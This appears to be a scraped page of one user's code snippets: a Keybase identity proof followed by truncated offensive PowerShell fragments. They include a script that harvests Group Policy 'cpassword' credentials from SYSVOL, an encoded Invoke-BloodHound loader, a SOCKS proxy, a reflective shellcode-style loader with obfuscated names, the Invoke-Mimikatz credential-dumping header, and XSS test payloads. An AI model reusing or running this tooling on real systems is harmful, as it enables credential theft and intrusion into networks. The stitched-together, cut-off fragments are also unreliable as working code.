I hereby claim:
- I am alacerda on github.
- I am alacerda (https://keybase.io/alacerda) on keybase.
- I have a public key ASDSq78cByBwvFr_Ezr7FuLAWLXQYcTrYMPc2AhX1fcFPwo
To claim this, I am signing this object:
<script>alert(1)</script> |
function 026904T3 { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() |
$pwdfoundgpo = New-Object 'System.Collections.Generic.List[System.Object]' | |
$DomainName = "" | |
$Items = Get-ChildItem "\\$DomainName\SYSVOL\*\Policies" -recurse -Filter *.xml | |
foreach ($XMLFileName in $Items){ | |
[string]$XMLContent = Get-content ($XMLFileName.FullName) | |
if($XMLContent.Contains("cpassword")){ | |
[string]$Cpassword = [regex]::matches($XMLContent,'(cpassword=).+?(?=\")') |
ZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkACAAewAgACAAIAAgACAAPAAjACAAIAAgACAAIAAuAFMAWQBOAE8AUABTAEkAUwAgACAAIAAgACAAIAAgACAAIAAgAFIAdQBuAHMAIAB0AGgAZQAgAEIAbABvAG8AZABIAG8AdQBuAGQAIABDACMAIABJAG4AZwBlAHMAdABvAHIAIAB1AHMAaQBuAGcAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4AIABUAGgAZQAgAGEAcwBzAGUAbQBiAGwAeQAgAGkAcwAgAHMAdABvAHIAZQBkACAAaQBuACAAdABoAGkAcwAgAGYAaQBsAGUALgAgACAAIAAgACAAIAAuAEQARQBTAEMAUgBJAFAAVABJAE8ATgAgACAAIAAgACAAIAAgACAAIAAgAFUAcwBpAG4AZwAgAHIAZQBmAGwAZQBjAHQAaQBvAG4AIABhAG4AZAAgAGEAcwBzAGUAbQBiAGwAeQAuAGwAbwBhAGQALAAgAGwAbwBhAGQAIAB0AGgAZQAgAGMAbwBtAHAAaQBsAGUAZAAgAEIAbABvAG8AZABIAG8AdQBuAGQAIABDACMAIABpAG4AZwBlAHMAdABvAHIAIABpAG4AdABvACAAbQBlAG0AbwByAHkAIAAgACAAIAAgACAAIAAgACAAYQBuAGQAIAByAHUAbgAgAGkAdAAgAHcAaQB0AGgAbwB1AHQAIAB0AG8AdQBjAGgAaQBuAGcAIABkAGkAcwBrAC4AIABQAGEAcgBhAG0AZQB0AGUAcgBzACAAYQByAGUAIABjAG8AbgB2AGUAcgB0AGUAZAAgAHQAbwAgAHQAaABlACAAZQBxAHUAaQB2AGEAbABlAG4AdAAgAEMATABJACAAYQByAGcAdQBtAGUAbgB0AHMAIAAgACAAIAAgACAAIAAgACAAZgBvAHIAIAB0AGgAZQAgAFMAaABhAHIAcABIAG8A |
I hereby claim:
To claim this, I am signing this object:
<# | |
.SYNOPSIS | |
Powershell Socks Proxy | |
Author: p3nt4 (https://twitter.com/xP3nt4) | |
License: MIT | |
.DESCRIPTION | |
Set-StrictMode -Version 2 | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
} | |
function func_get_delegate_type { |
function Invoke-Mimikatz | |
{ | |
<# | |
.SYNOPSIS | |
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
dump credentials without ever writing the mimikatz binary to disk. | |
The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
<script>alert(1)</script> |
function embroil { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() | |
) | |
$PhtttnVb99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) |